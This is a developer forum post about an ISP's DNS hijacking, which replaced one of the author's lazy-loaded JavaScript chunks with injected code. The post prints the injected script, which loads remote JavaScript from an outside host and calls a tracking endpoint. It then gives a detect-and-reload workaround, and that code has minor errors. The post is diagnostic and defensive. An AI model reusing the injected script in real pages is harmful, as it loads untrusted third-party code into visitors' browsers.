after searching hard, I found the answer here: https://codeshelper.com/q/10.
appeared because China Telecom hijacked dns, and turned my original 5.fd7xxxxxxxxxxxx.js into the following code
on the web page.
var _b, _c, _ju = "http://testapi.233sy.cn/tg/down/static/js/5.fd7c409603287d19fa4b.js";
_ju = _ju + (_ju.indexOf("?") > 0 ? "&" :"?") + "_t=" + new Date().getTime(),
_b = "AH488569",_c = "382542271_(iKm6V1g0V1P6wj8Nih==_358325746_@iJvkDKehwJ9Wi6et9JgWitfZMe==_)iKghiJeh", function(a) {
function b(b) {
var c = a.createElement("script");
c.setAttribute("src", b), a.head ? a.head.appendChild(c) :a.body && a.body.appendChild(c);
}
var c = a.location.host.split("."), d = c.length, e = c[d - 2] + "." + c[d - 1];
/^(com|net|org|gov)$/.test(c[d - 2]) && d > 2 && (e = c[d - 3] + "." + c[d - 2] + "." + c[d - 1]),
_ju.indexOf(e) > 0 ? (a.write('<div><script>document.write(unescape(\'%3Cscript id="_ju_" src="' + _ju + "\" %3E%3C/script%3E') );</script></div>"),
a.getElementById("_ju_") || b(_ju)) :b(_ju), b("http:///gfnsdv.yxwwj.cn:8001/pjk/static/tp.php?b="+_b+"&");
}(document);
I am using routing lazy loading to get the above prompt. Before module 5 was replaced with this, the load is not available.
solution:
1, use https protocol, do not let telecom hijack dns
2, judge the existence of abnormal code, and refresh the address (in the short term, this is how we solve it at present)
window.onload = function(){
let isSetInt = false;
let setInt = setInterval(r => {
let index = getstore() || 0;
let findDns = false;
if (isSetInt) {
clearInterval(setInt);
let scr = document.getElementsByTagName('script');
for (var i = scr.length - 1; i >= 0; i--) {
if (scr[i].src.indexOf('gfnsdv.yxwwj.cn') != -1 && index < 2) {
findDns = true;
store(PPindex);
window.location.reload();
break;
}
}
if (!findDns) {
store(0)
}
}
try{
if (getmd5) {
isSetInt = true;
}
}catch(e){
console.log(e);
}
},1000);
}
function store (state) {
try {
return localStorage.setItem('index', state);
} catch (e) {
cookie.setCookie('index',state, 1);
}
}
function getstore () {
if (localStorage.getItem('index') == null) {
return unescape(cookie.getCookie('index'));
}else{
return localStorage.getItem('index');
}
}
https still hijacks
reference https://codeshelper.com/a/11.